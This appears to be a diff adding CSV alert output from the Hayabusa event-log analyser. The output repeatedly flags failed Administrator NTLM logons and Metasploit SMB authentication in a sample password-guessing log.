+2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nBVMAki1Ghpknf6p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pXKhNUmBUQBTyeNM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d1g9TVwsweaBfZgE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kWymb6ucohaBB60b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LjL0zwlZofVuWhGC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nxsdzkJdnaZs5eKL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PR6EpKvbqMeoQlKI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OZ3LMTtsVNI1gRO2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 75bNeXwYSZPhJdJ7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lH6TVXSqJb1qLd3t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: edDWye6c2UhKznR6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AxKUl1lynGY1ectn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vI5yUgukPBVRorJI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmR29QcBKMGVQ8rB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b7luV5GfiT0v0h7D  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yA7pIDFgQbLIInqs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 84g2gO0253Ut4O1O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DRkFX9WTAhBZ8jc8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WuoQAi4k3XZPaf4O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KjKMhCnbR0uFT0av  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1lfwqPB0AgTfIOt4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mJuG26pQzdjUQael  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GXwEziYTA3DkkFVq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CHr6dirvkT8B9ZVs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B5eSMLiF4BsfY3xN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 64ISDuFRhR6cFYVQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hcprXytyuBw380XY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BxfQWiSIhZYxwNjh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FcL982boDelzeyzK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NBAAjRdaR8U0tqt7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EmqUjcltAW6StHQJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 129Rp3HCmRVRXw3C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jpIIQP2oWEF51EBI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HREGh5ppEkLAuEob  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UVkpQvotEMfM8R0C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dm6uHEy5RJJBJ6FG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HPTyAkYjcIlko5lu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OjlRoo9Sot4Fx4Th  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XslY26kw2aBw19D8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1404fakprYeqGiNY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: y2VfIjtBcXCRlOjp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LPztyX4J9NV8EldT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 07flrrzWgsVBYaN2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vgkqkC1VvznGxR6N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hMn6yDMLgLChJTL6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uSTokOJ31Tj0bLXv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
